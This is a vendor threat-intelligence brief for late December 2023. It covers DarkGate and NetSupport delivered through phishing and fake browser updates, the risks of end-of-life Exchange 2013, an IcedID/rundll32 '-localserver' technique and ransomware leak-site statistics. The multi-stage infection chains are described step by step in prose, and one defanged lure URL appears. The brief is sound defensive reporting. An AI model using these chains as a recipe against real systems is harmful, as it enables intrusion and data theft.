Cyber Intel Brief: December 21 – 27, 2023

By Eric Ford, Sr. Threat Intelligence Analyst

Estimated Reading Time: 18 minutes

Phishing Campaign Uses DarkGate RAT and NetSupport, ATI OSINT and Diligence Pays Dividends, and For Crying Out Loud–Stop Using Microsoft Exchange Server 2013

This week: a recent phishing campaign delivers the DarkGate RAT and uses NetSupport in attacks; we discuss the severe risk of not updating end-of-life software like Microsoft Exchange 2013, and we see how ATI open source intelligence and continued diligence often leads to discovery of malicious activity. We take a deeper dive into this year’s ransomware landscape, and provide details of two new CVEs.

In our latest Cyber Intelligence Brief, Deepwatch ATI looks at new threats and techniques to deliver actionable intelligence for SecOps organizations. 

As a leading managed security platform, Deepwatch stands at the forefront of delivering actionable intelligence to keep pace with the ever-evolving threat landscape. Through the Deepwatch Adversary Tactics and Intelligence (ATI) team, we arm your organization with essential knowledge, giving you the power to proactively spot and neutralize risks, amplify your security protocols, and shield your financial stability.

Each week we look at in-house and industry threat intelligence and provide ATI analysis and perspective to shine a light on a spectrum of cyber threats.

Phishing Email and Fake Browser Update Campaigns Deliver DarkGate and NetSupport Remote Access Trojans

Windows SmartScreen CVE-2023-36025 – DarkGate – Remote Access Trojan – NetSupport RAT – BattleRoyal Intrusion Set – Phishing Email Campaign – Fake Browser Updates – Industries/All

Threat Analysis

In the latter half of 2023, Proofpoint observed at least 20 email campaigns spreading the DarkGate malware, a new Remote Access Trojan (RAT) and loader. These campaigns all had similarities in tactics, techniques, procedures (TTPs), and arsenal, resulting in Proofpoint tracking the activity as an Intrusion Set named “BattleRoyal.” This Intrusion Set led to the discovery of a fake browser update campaign, identified as the RogueRaticate/FakeSG, that delivered the DarkGate malware. 

Phishing Emails

Between September and November 2023, Proofpoint’s research has identified at least 20 distinct email campaigns using DarkGate. These campaigns are recognizable by their use of specific GroupIDs, namely “PLEX,” “ADS5”, “user_871236672”, and “usr_871663321”. The email campaigns involved tens of thousands of emails targeting various industries, primarily in the USA and Canada. These emails were crafted to entice recipients into triggering the malware download. 

One of the first campaigns identified was notable due to using more than one traffic delivery system (TDS). The emails in this campaign contained 404 TDS URLs that, if clicked by the user, were redirected to the Keitaro TDS. The Keitaro TDS downloaded an internet shortcut (.URL) file. While other parts of the attack chain from this cluster changed or varied, .URL files were involved in every campaign and exploited CVE-2023-36025, a vulnerability in Windows SmartScreen. The BattleRoyal Intrusion Set exploited this vulnerability more than any other actor observed in Proofpoint telemetry data. Notably, this threat activity cluster exploited CVE-2023-36025 before it was published by Microsoft. 

The .URL file, when a recipient double-clicked it, downloaded a zipped VBS script. The script, in turn, downloaded and executed several shell commands (cmd.exe). The shell commands:

  • Created a directory on C: drive
  • Copied curl.exe from the system folder to this new directory
  • Used curl to download Autoit3.exe
  • Used curl to download and save an AutoIT script
  • Ran the downloaded AutoIT script with the downloaded AutoIT interpreter. 
  • The AutoIT script then ran the embedded DarkGate malware.

From late November to early December, Proofpoint observed the threat actor(s) replacing DarkGate with NetSupport, a legitimate remote access tool. 

Besides the payload switch, another notable change in this campaign that represents a gradual evolution of the threat actors includes using two .URL files instead of one. 

In an example campaign on 28 November 2023, the emails contained: URLs (hxxps[:]//adclick.g.doubleclick[.]net) that, if clicked by the user, are redirected to Keitaro TDS. 

  • Keitaro TDS downloaded an Internet shortcut (.URL) file.
  • The Internet shortcut, if double-clicked, downloaded another Internet shortcut (.URL) file.
  • The second Internet shortcut linked to a NetSupport executable. 

Fake Browser Updates

The RogueRaticate/FakeSG campaign compromised websites to deliver fake browser update requests, using different templates depending on which browser the victim is running, to end users that dropped a DarkGate payload with the “ADS5” GroupID. On the compromised website, the threat actor injected a request to an actor-controlled domain that used .css steganography to conceal the malicious code. 

Upon visiting a compromised website, the concealed code makes a request to an actor-controlled Keitaro domain that would filter out unwanted traffic. Users who passed the traffic inspection would be presented with highly convincing fake browser update notifications. 

These notifications are carefully crafted to mimic the look and feel of legitimate update prompts from popular browsers like Chrome, Firefox, or Edge. The design of these fake updates is sophisticated and up-to-date, often matching the latest user interface elements of the respective browsers. For instance, a Chrome user might see a pop-up that closely resembles Chrome’s own update notification, complete with familiar color schemes, fonts, and logos. 

The notification typically urges the user to download an ‘urgent’ or ‘critical’ update, citing improved security or enhanced features. The language used is persuasive and creates a sense of immediacy, prompting the user to act quickly. To add to the authenticity, the notification might appear at moments that seem contextually appropriate, such as when a user first opens the browser or navigates to a new page.

When a user clicks on the ‘update’ button in these fake prompts, instead of receiving a genuine browser update, they download a similar .URL file and follow the attack chain from that point to deliver DarkGate, as observed in the email campaigns.

This particular Intrusion Set is notable for employing multiple attack chains and payloads. The DarkGate payload is capable of stealing confidential information and downloading other malware payloads. The Netsupport payload is used by threat actors to gain control over an infected host, install additional malware, and facilitate lateral movement throughout the compromised environment. 

What makes this Intrusion Set unique is the actor’s use of both email and fake update lures in their attack chains. This aligns with the overall trend of cybercriminals adopting new and varied attack chains, including TDS tools, to deliver malware. The actor’s use of both email and fake update lures shows that they are employing multiple social engineering techniques to trick users into installing the final payload.

Risk & Impact Assessment

The emergence and evolution of this Intrusion Set, particularly its use of DarkGate and subsequent switch to NetSupport RAT, presents significant risks and impacts to business operations. The sophisticated nature of the phishing campaigns and the deceptive fake browser updates increase the likelihood of successful breaches. These tactics can lead to the exfiltration of sensitive data, installation of additional malware, and potential compromise of critical systems. The shift to using NetSupport RAT, a tool that can be perceived as legitimate, further complicates detection and response efforts. This evolving threat landscape underscores the vulnerability of even well-protected networks, as threat actors continuously adapt and refine their methods to exploit new vulnerabilities and bypass security measures. The impact of such breaches extends beyond immediate data loss, encompassing long-term reputational damage, loss of customer trust, and potential disruption of business operations.

Assessing the material impact of these threats, it is evident that there is a considerable likelihood of a significant adverse effect on a company’s business operations, results of operations, or financial condition. The successful infiltration and persistence of such malware within corporate networks can lead to substantial operational disruptions, including downtime, loss of productivity, and the diversion of resources to incident response and recovery efforts. Financially, the implications are multifaceted, ranging from direct costs associated with breach mitigation, legal liabilities, and potential regulatory fines to indirect costs like increased insurance premiums and investment in strengthening cybersecurity infrastructure. 

For companies in sectors where data integrity and security are paramount, the impact can be even more pronounced, potentially leading to loss of competitive advantage and long-term financial repercussions. Therefore, it is crucial for organizations to recognize the severity of these risks and proactively implement comprehensive security measures to mitigate potential material impacts on their operations and financial health.

Source Material: Proofpoint, BattleRoyal, DarkGate Cluster Spreads via Email and Fake Browser Updates

The Severe Risks of Continuing to Use Microsoft Exchange Server 2013

Microsoft Exchange Server 2013 – Software End-of-life Risks – Ransomware – Vulnerability Exploitation – Industries/All

Threat Analysis

The cyber threat landscape surrounding the use of Microsoft Exchange Server 2013 has evolved significantly, especially following its transition to end-of-life status in April 2023. Recent trends have shown a noticeable increase in ransomware attacks targeting organizations using Exchange Server 2013. This uptick is particularly alarming given the server’s widespread adoption across various sectors, including government and corporate entities. A typical configuration for these attacks has been identified as Exchange Server 2013 with Outlook Web Access (OWA) enabled. While common for user convenience, this configuration exposes organizations to risks.

The transition of Microsoft Exchange Server 2013 to end-of-life has critical implications for security, as it means no further security updates or patches will be released by Microsoft for this version. The cessation of security updates exposes organizations using Exchange Server 2013 to emerging threats. Without ongoing updates, these systems become increasingly vulnerable to exploitation by cybercriminals. There is a concerning trend where organizations believe their systems are secure if they have applied all available security updates. However, the end-of-life status of Exchange Server 2013 means that new vulnerabilities discovered post-support will not be addressed, leaving systems at risk.

Furthermore, Microsoft does not test new security vulnerabilities on end-of-life versions of Exchange Server. When a new vulnerability is discovered, the end-of-life version of Exchange Server will not be listed as vulnerable. Because of this policy, no new vulnerabilities have been recorded in the Common Vulnerabilities and Exposures (CVE) databases for Exchange Server 2013. This absence can create a misleading perception of security. The absence of CVE entries does not mean the absence of vulnerabilities, as the maxim goes: “The absence of evidence is not evidence of absence.” In reality, it reflects the cessation of official vulnerability assessments by Microsoft, likely leaving undiscovered or undisclosed vulnerabilities in the system.

Instances have been observed where ransomware attacks successfully penetrated organizations where the apparent entry vector was a fully patched Exchange Server 2013 server with Outlook Web Access enabled. These incidents are likely the result of known vulnerabilities, given that various post-authentication Exchange Server vulnerabilities exist. However, the possibility of zero-day exploits being used cannot be ruled out, given the lack of ongoing security updates and assessments.

Exchange Server 2013 marks a significant point in the evolution of Microsoft’s Exchange Server line, introducing features and architectural changes not present in earlier versions like Exchange 2007. Some features intended to enhance functionality and integration inadvertently introduced new security challenges. Exchange Server 2013 is deeply integrated with Active Directory, which, while beneficial for system management, creates significant security risks. This integration often makes it easier for threat actors to escalate privileges once they have compromised the Exchange Server.

The codebase for Exchange Server 2013 includes components added for Exchange Online, which have been linked to various security issues. These components introduced the ProxyLogon, ProxyShell, and ProxyNotShell vulnerabilities. Despite these known vulnerabilities, Exchange Server 2013 continues to be widely used in various sectors, including critical ones like government and finance. This widespread use, coupled with the unique vulnerabilities, creates a substantial risk profile.

Despite its end-of-life status, Exchange Server 2013 remains widely used worldwide, including many organizations in critical sectors such as government, finance, and healthcare. Many organizations continue to use Exchange Server 2013 with Outlook Web App enabled, almost 25,000, due to the complexities and costs associated with upgrading to newer versions. This reluctance or delay in upgrading exacerbates the security risks. There is a general underestimation of the risks associated with using end-of-life software. Many organizations might not fully comprehend the security implications of continuing to use Exchange Server 2013. The reliance on vulnerability scanners that do not flag issues with end-of-life software further contributes to a false sense of security among these organizations.

Additionally, Exchange Server 2013 honeypot networks have recorded frequent attacks from threat actors with valid credentials into Outlook Web App over the past few months, suggesting threat actors actively seek and exploit vulnerabilities in Exchange Server 2013, even without publicly known CVEs.

The end-of-life status of Exchange Server 2013 has left it without critical security updates, making it increasingly vulnerable to exploitation. There has been a marked increase in ransomware attacks targeting Exchange Server 2013, exploiting its unique vulnerabilities and integration with critical systems like Active Directory. Many organizations, including those in sensitive sectors, continue to use Exchange Server 2013, often underestimating the risks associated with end-of-life software. The widespread practice of exposing Outlook Web Access (OWA) to the internet has notably increased the attack surface, making organizations more susceptible to cyber-attacks. 

It is imperative for organizations to recognize the heightened risks associated with Exchange Server 2013 and to reassess their reliance on this end-of-life software. Organizations must adopt proactive measures, including upgrading to supported versions of Exchange Server, implementing robust security practices, and regularly reviewing their cybersecurity posture.

Risk & Impact Assessment

The continued operation of Microsoft Exchange Server 2013 in its end-of-life phase exposes organizations to significant cybersecurity risks, primarily from heightened vulnerability to attacks like ransomware. This vulnerability is intensified by the server’s integration with critical systems, potentially leading to escalated breaches and severe data compromises. The impacts of such incidents extend beyond data loss to include operational disruptions, reputational damage, and regulatory non-compliance, especially in sensitive sectors like government, finance, and healthcare. These breaches can result in substantial financial losses, legal liabilities, and erosion of customer trust.

Assessing the material impact on a company’s business operations and financial condition reveals a high likelihood. The probability of a cyber-attack exploiting known vulnerabilities in Exchange Server 2013 and the potential severity of such an incident suggests a material impact is not only possible but probable. Companies may face considerable direct costs from operational disruptions and breach remediation, as well as indirect costs like reputational harm and loss of market confidence. For organizations in regulated industries, the compliance risks and associated penalties further heighten the potential for a material financial impact, underscoring the need for urgent and comprehensive risk management strategies.

Source Material: Kevin Beaumont, The ticking time bomb of Microsoft Exchange Server 2013

Deepwatch’s Open-source Intelligence Collection and Reporting Frequently Leads to the Discovery of Malicious Activity

IcedID – Cobalt Strike – Trojan – Rundll32 – Domain Compromise – Abnormal Parent Spawning Rundll32 – Industries/All

Threat Analysis

Our original report, “IcedID Leads to Domain Compromise, Cobalt Strike, & Data Exfiltration,” published in early January 2023, is a perfect example that highlights Deepwatch’s Adversary Tactics and Intelligence team’s post-reporting work. While focused on an IcedID infection leading to domain compromise, our post-intelligence work led to observing a technique (abnormal parent process spawning Rundll32) employed in this campaign in several customer environments. 

The Abnormal Parent Spawning “Rundll32” technique involves a parent process, like explorer.exe, spawning the child process rundll32.exe with an uncommon argument, such as “-localserver.” Cybercriminals often use this technique to execute malicious code on a victim’s computer.

For instance, a threat actor would use explorer.exe because it’s a legitimate and commonly trusted Windows process typically associated with the Windows File Explorer. Its ubiquity and trust within the operating system make it an ideal candidate for initiating less suspicious actions. The child process, rundll32.exe, is another legitimate Windows utility. Its primary function is to load and run functions stored in Dynamic Link Library (DLL) files. However, rundll32.exe can also be employed for malicious activities due to its versatility.

Using uncommon arguments, such as “-localserver” to load malicious registered COM objects, is a key aspect of this tactic. Regular day-to-day computer operations typically do not use these arguments, and their presence can strongly indicate an unusual and potentially malicious use of rundll32.exe. Threat actors favor this method for several reasons. Mainly because it offers a degree of stealth and can bypass security measures, using legitimate system processes that help to camouflage malicious activities, making them harder to detect by users, and may bypass conventional security software. 

To underscore the importance of our reporting, customers must recognize that these reports are not just educational but are instrumental in proactive defense. By staying informed through our detailed analyses, customers can better understand the evolving threat landscape and enhance their security posture. Our ability to detect and report on tactics like the ‘Abnormal Parent Spawning Rundll32’ demonstrates the value of continuous vigilance and intelligence-led security strategies. We encourage all our customers to regularly engage with our reports to avoid potential threats and safeguard their digital environments effectively.

Overview of Initial Reporting

The initial infection method employed by the cybercriminal involved the victim opening an archive containing an ISO file, which creates a virtual disk. The victim navigated to the virtual disk and clicked the only file visible, an LNK file. The LNK file runs a batch file that drops a DLL into a temporary folder and runs it with rundll32.exe, which loads the DLL to create network connections to IcedID-related domains and downloads the IcedID payload. IcedID payload is loaded into the process and establishes persistence on the machine. After gaining access with IcedID, regsvr32.exe was used to load the file “cuaf.dll,” a Cobalt Strike beacon, moving throughout the network laterally.

Risk & Impact Assessment

The implications of this technique are significant. The primary concern is the potential compromise of the system, where malicious code can be executed without immediate detection. This technique could lead to various detrimental outcomes, such as data theft, data damage, or the establishment of persistent access to the system for ongoing exploitation. This tactic’s ability to evade detection increases the likelihood of a successful attack and prolongs the attacker’s presence within the system, potentially leading to more severe consequences over time.

Source Material: Cybereason, Threat Analysis: From IcedID to Domain Compromise

Data Leak Sites List 2,436 Victims in 2023

Lockbit Ransomware – CL0P Ransomware – ALPHV Ransomware – Black Basta Ransomware – Play Ransomware – Ransomware – Manufacturing – Professional Services – Information – Finance and Insurance – Educational Services

Our comprehensive analysis of the ransomware leak sites in 2023 reveals a complex and evolving threat environment, with 2,436 victims listed. Key findings from the data indicate that ransomware remains a significant and growing threat to a wide range of industries and countries, with specific industries and regions being particularly vulnerable.

The ransomware ecosystem is primarily dominated by a few key players – Lockbit, CL0P, ALPHV, Black Basta, and Play. Collectively, these groups account for a substantial portion of the attacks, each exhibiting unique targeting patterns and preferences.

Manufacturing, professional, scientific, and technical services, information technology, finance and insurance, and educational services emerged as the most targeted industries. These industries are possibly chosen due to their critical operational roles, the sensitivity of the data they handle, and their perceived ability to pay ransoms.

The United States, the United Kingdom, Canada, Germany, and France are the most affected countries, highlighting a focus on economically developed regions with high levels of digital infrastructure. This concentration suggests that ransomware groups may strategically target these regions due to the lucrative opportunities for extortion.

Each ransomware group has demonstrated distinct preferences for specific industries, potentially reflecting their operational strategies. For instance, Lockbit heavily listed the manufacturing industry, while CL0P listed the finance and insurance industry the most.

Our analysis strives to be comprehensive, utilizing the most current data available from our dark web monitoring platform. However, it is crucial to acknowledge this data set’s inherent discrepancies. Despite our best efforts, the data set may include victims who are not listed on leak sites or were previously listed. Additionally, we may have omitted victims we could not verify. As the data set does not include information about the industry, we do our best to classify the victims based on the NAICS industry classification system. This manual effort may introduce other discrepancies, such as misclassifying the industry. We also recognize that our data set does not represent the full scope of ransomware victims, as it only reflects those listed on leak sites, and groups do not list every victim they attacked on their sites. As such, while we believe our analysis provides valuable insights, it should be considered with an understanding of these potential discrepancies. Read the full report for complete details.

CISA Adds 2 CVEs to Known Exploited Vulnerabilities Catalog

QNAP VioStor NVR CVE-2023-47565 – FXC AE1021, AE1021PE CVE-2023-49897

In the past week, CISA added two CVEs to its Known Exploited Vulnerabilities Catalog, impacting QNAP and FXC products. These vulnerabilities can have severe consequences, including allowing authenticated users to execute commands via a network. The link to ransomware campaigns for these vulnerabilities is currently unknown. The Adversary Tactics and Intelligence team recommends mitigative action occur according to the mitigation “Due Date” recommended by CISA.

CVE IDVendorProductDescriptionCISA Due DateUsed in Ransomware Campaigns
CVE-2023-47565QNAPVioStar NVRQNAP VioStar NVR contains an OS command injection vulnerability that allows authenticated users to execute commands via a network.1-11-2024Unknown
CVE-2023-49897FXCAE1021 and AE1021PEFXC AE1021 and AE1021PE contain an OS command injection vulnerability that allows authenticated users to execute commands via a network.1-11-2024Unknown

Let’s Secure Your Organization’s Future Together

At Deepwatch, we are committed to helping organizations like yours navigate the intricate world of cyber threats. Our cybersecurity solutions are designed to stay ahead of the curve, providing you with the proactive defenses needed to protect your organization from these threats.

Our team of cybersecurity professionals is ready to evaluate your systems, provide actionable insights, and implement robust security measures tailored to your needs.

Don’t wait for a cyber threat to disrupt your operations. Contact us today and take the first step towards a more secure future for your organization. Together, we can outsmart the threats and secure your networks.

What We Mean When We Say

Estimates of Likelihood

We use probabilistic language to reflect the Intel Team’s estimates of the likelihood of developments or events because analytical judgments are not certain. Terms like “probably,” “likely,” “very likely,” and “almost certainly” denote a higher than even chance. The terms “unlikely” and “remote” imply that an event has a lower than even chance of occurring; they do not imply that it will not. Terms like “might” reflect situations where we are unable to assess the likelihood, usually due to a lack of relevant information, which is sketchy or fragmented. Terms like “we can’t dismiss,” “we can’t rule out,” and “we can’t discount” refer to an unlikely, improbable, or distant event with significant consequences.

Confidence in Assessments

Our assessments and projections are based on data that varies in scope, quality, and source. As a result, we assign our assessments high, moderate, or low levels of confidence, as follows:

High confidence indicates that our decisions are based on reliable information and/or that the nature of the problem allows us to make a sound decision. However, a “high confidence” judgment is not a fact or a guarantee, and it still carries the risk of being incorrect.

Moderate confidence denotes that the information is credible and plausible, but not of high enough quality or sufficiently corroborated to warrant a higher level of assurance.

Low confidence indicates that the information’s credibility and/or plausibility are in doubt, that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that we have serious concerns or problems with the sources.

Eric Ford

Eric Ford, Sr. Threat Intelligence Analyst

Eric is an accomplished intelligence professional with 10+ years of experience in the intelligence field supporting the Department of Defense and commercial organizations. He is responsible for collecting open-source information and analyzing it to turn it into actionable intelligence.

Read Posts


LinkedIn Twitter YouTube

Subscribe to the Deepwatch Insights Blog